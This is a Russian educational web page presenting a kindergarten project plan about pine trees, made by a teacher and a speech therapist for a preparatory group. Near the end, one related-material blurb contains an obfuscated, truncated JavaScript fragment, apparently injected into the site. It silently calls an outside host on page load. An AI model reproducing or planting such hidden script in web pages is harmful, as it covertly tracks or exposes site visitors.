Проект "С кем дружит сосна?"
проект (подготовительная группа)

Светлана Николаевна Крючкова

Представлен паспорт информационно-исследовательского проекта в компенсирующей группе, проведенного совместно с воспитателем.

Скачать:

ВложениеРазмер
Microsoft Office document icon pasport_proekta_s_kem_druzhit_sosna.doc867 КБ

Предварительный просмотр:

Бюджетное дошкольное образовательное учреждение

Кичменгско-Городецкого муниципального района

«Детский сад комбинированного вида «Берёзка»

Проект

«С кем дружит сосна?»

   

 

 

     

     Воспитатель компенсирующей группы Плескунина И.В.                                                    

                                                    Учитель-логопед Крючкова С.Н.

с. Кичменгский Городок

2019 год

Вид проекта:

По доминирующему методу:  информационно-исследовательский.

 

По количеству участников: групповой.

По срокам реализации  – среднесрочный  (08.04- 30.04.2019г.)

 Участники проекта: дети компенсирующей группы, воспитатель, учитель-логопед, родители, медсестра детского сада.

 

   I этап - погружение в проект

   Раздается стук в дверь. Воспитатель обращает на него внимание и незаметно для ребят вносит игрушку – Лесовичка с письмом. Педагог делает вид, что слушает его рассказ и передает его просьбу детям. Он пришел в гости к детям для того, чтобы рассказать об одной знакомой сосне, которая очень мечтала найти друзей. О  своей беде рассказала Лесовичку, он записал ее рассказ и принес его нам в  детский сад.

    Педагог читает детям сказку И. Ревю (адаптированную авторами проекта) «Как Сосна искала себе друзей» (Чтение сопровождается показом картинок по  тексту)

    «Жила-была одинокая Сосна. Было ей грустно, потому что у нее не было друзей. Она видела, что у других деревьев есть друзья, у кустарников тоже. Вот она призвала в друзья Рябину: «Рябинушка кудрявая, красные ягодки, давай с тобой дружить!».

   А Рябинушка говорит: «Я бы с тобой, Сосна, подружилась, но уж больно ты высокая, мощная, а я – маленькая, кудрявая». Расстроилась Сосна.

  Прибежал к Сосне  Кабан  и по своей привычке начал рыть землю в поисках желудей. И ему предложила свою дружбу Сосна. Отказался Кабан: «Не могу с тобой дружить, Сосна, мне нечем будет  питаться, ведь я очень люблю желуди. Поищи себе другого друга». Огорчилась Сосна.

   Прибежал к дереву Заяц и стал искать место, где бы спрятаться. Сосна ему говорит: «Заяц, давай с тобой дружить!». Длинноухий отвечал: «Не могу я с тобой дружить, Сосна. Мне негде будет прятаться от моих врагов, потому что твои веточки растут высоко». Снова расстроилась Сосна.

   Пролетала около Сосны  быстрокрылая  Ласточка. Сосна  предложила ей свою дружбу. Птица ответила дереву: «Не могу с тобой дружить, Сосна, ведь ты высокая, мне гнездо на твоих ветвях не свить».

  Совсем грустная стала Сосна: «Искала я подружку или  друга себе по душе, но не нашла. Вот стою одинокая и горюю».

  Проблема: Сосне не с кем дружить.

  Цель предстоящей деятельности: помочь Сосне найти друзей.

   Поиск форм реализации проекта:

  1. Узнать у педагогов об особенностях внешнего вида и строения сосны, месте произрастания и  условиях, благоприятных для роста;
  2. Выяснить  из различных источников о животных и птицах, которые обитают в сосновых лесах;
  3. Познакомиться с растениями, произрастающими в соседстве с сосной;
  4. Узнать у медсестры детского сада о  значении сосны  в жизни  человека.

  1. этап:   организация  деятельности.

1) Оборудование,     материалы.

Внесение изменений в РППС группы:

- подбор и изготовление материалов по теме проекта (видеоролики, презентации);

- оформление и внесение дидактических игр «От семечка до дерева», «Строение дерева»;  

- подготовка материалов к опытам «Где прячутся семена?», «Определение запаха хвои»;

Сбор информации по теме проекта.

Подбор фото- и  видеоматериалов по теме проекта.

Подбор энциклопедической, детской художественной литературы для выставки.

Ноутбук, мультимедийное оборудование, фотоаппарат.

2) Распределение  роли  между  участниками  (деление  детей  на  микрогруппы).

Группа «Познавайки»

Группа «Исследователи»

3)  Составление  развернутого  плана  реализации проекта.

  1. этап:   Осуществление  деятельности  (реализация  проекта).

Этапы  проекта:

    Этапы  проекта

Деятельность  педагога

Деятельность  детей

  1. Этап

Погружение  в  проект

- Пробуждает  у  детей  интерес  к  теме  проекта  (вводит  в  ситуацию);

  • Очерчивает  

проблемное  поле  (формулирует  проблему);

  • Формулирует  задачи  в  

общих  чертах.

- Собирает информацию о

сосне, её особенностях, взаимосвязи с животными, птицами, растениями, насекомыми.

- Подбирает иллюстратив- ный, наглядный материал, видеоролики,  ширмы для родителей по теме проекта.

- Оформляет дидакти-ческие игры, лэпбук.

  • Вхождение  в  

проблему;

  •  Вживание  в  игровую  

ситуацию;

  • Принятие  задач;
  • Дополнение  задач  

проекта  (конкретизируют  задачи – «присваивают»)

  1. Этап

Организация  деятельности

  • Помогает  в  реализации  

задач;

  • Помогает  спланировать  

деятельность;

  • Организует  деятельность;
  • Организует  детей в  

группы

  • Объединяются  в  

рабочие  группы  (по  желанию);

  • Распределяют  роли  

  1. Этап

Осуществление  деятельности

  • Практическая  помощь  

(при  необходимости);

  • Направляет  и  

контролирует  осуществление  проекта

  • Формирование  

специфических знаний,  умений  и  навыков

  1. Этап

Презентация

- Подготовка  к  презентации;

- Презентация проекта

  • Подготовка  продукта  

проектной деятельности  к  презентации

Схема реализации основного этапа проекта

 

Виды детской деятельности

Содержание мероприятий

Познавательно-исследовательская деятельность

Рассматривание иллюстраций с изображением сосны, сосновых аллей, парков,  лесов.

 

Просмотр видеороликов, презентаций «Сосна: какая она?», «Сосна обыкновенная: от семени до посадки сеянца» (Ю-тюб, пользователь Артем Косицин).

Целевая прогулка в сосновый парк.

Проблемные ситуации «Что будет, если исчезнут все деревья?», «Чем опасен короед для сосен?», «Подари вторую жизнь шишкам».

Опыт «Где прячутся семена?», «Определение запаха хвои».

Дидактическая игра «Кто живет в сосновом бору?» (Составляем  пищевую цепочку)

Встреча с медсестрой  Кашу М.К. «О пользе сосны для человека».

Восприятие

художественной литературы

и фольклора

Стихи:

Н.Коротких «В сосновом бору».

Н. Григорьева «Мы сажали на полях»,

А.Бубнов «Снежные  шапки сосен» (местный поэт)

Т. Шарыгина «Сосновый бор»,

И. Токмакова «Сосны»

Сказки:

С. Афоньшин «Как сосна лосяток спасала», Е.Максимова «Сосна», «Почему сосна всегда зеленая» (чувашская сказка).

Рассказы:

Ф.Абрамов «Сосны»

И.Соколов-Микитов «Сосна», «Год в лесу».

Т.Гогулина «Дедушкин лес».

Н.Сладков «Муравьиная крыша».

Е. Максимова «Сосна. Про мачты, янтарь и сосновые яблоки».

В. Песков «Лечебница под сосной».

 Разучивание пословиц и поговорок.

Загадывание загадок о сосне.

Двигательная  деятельность

Подвижные игры «Сосны-пеньки», «Кто больше соберет шишек», «Кто точнее бросит шишку», «Кто дальше бросит шишку».

Самомассаж с шишками.

Коммуникативная деятельность

Речевые  и  дидактические игры:

 «Собери дерево» (Цель: развитие зрительного восприятия, словарного запаса)

«Назови ласково», «Посчитай»  

(Цель: развитие грамматических категорий)

«Какая сосна?» (Цель: обогащение словарного запаса именами прилагательными).

«Подбери слова-приятели» (Цель: обогащение словарного запаса однокоренными словами)

Взаимодействие с родителями:

Ширма «Лекарственные свойства сосны».

Привлечение родителей к оформлению лэпбука «Сосна и её друзья».

  1. этап – Презентация  проекта.

- презентация проекта в  форме  театрализованного представления перед детьми старшей группы «С кем дружит сосна?».

- продукт проекта: лэпбук  «Сосна и её друзья».

    Ожидаемые результаты:  

   В ходе проекта  дети приобретут навыки поисковой деятельности,  научатся наблюдать, исследовать, делать выводы, умозаключения, повысится познавательная активность, будут совершенствоваться навыки сотрудничества со сверстниками и взрослыми.

  Дети будут иметь  представления о значении сосны в природе, в жизни  птиц, животных, насекомых, растений, о пользе для человека.

Список литературы:

  1. Н. А. Виноградова, Е. П. Панкова. Образовательные проекты в детском саду. Пособие для воспитателей. - Москва, 2008г.

2. В. И. Морозов. Рассказы о русском лесе. - Москва, «Малыш», 1991.

3. И. Шустова.  Азбука. Растения России. – Москва, «Дрофа», 2008.

4. «Я познаю мир». Детская энциклопедия. Растения. - Москва. «АСТ»,1995.

  1. Интернет – ресурсы.


По теме: методические разработки, презентации и конспекты

Проект «C туризмом дружит вся семья» (старший дошкольный возраст)

Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....

Если хочешь долго жить - научись с огнем дружить!

Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....

Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"

Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...

Конспект занятия "Давайте дружить"

Конспект занятия по развитию речи в 1 младшей группе....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...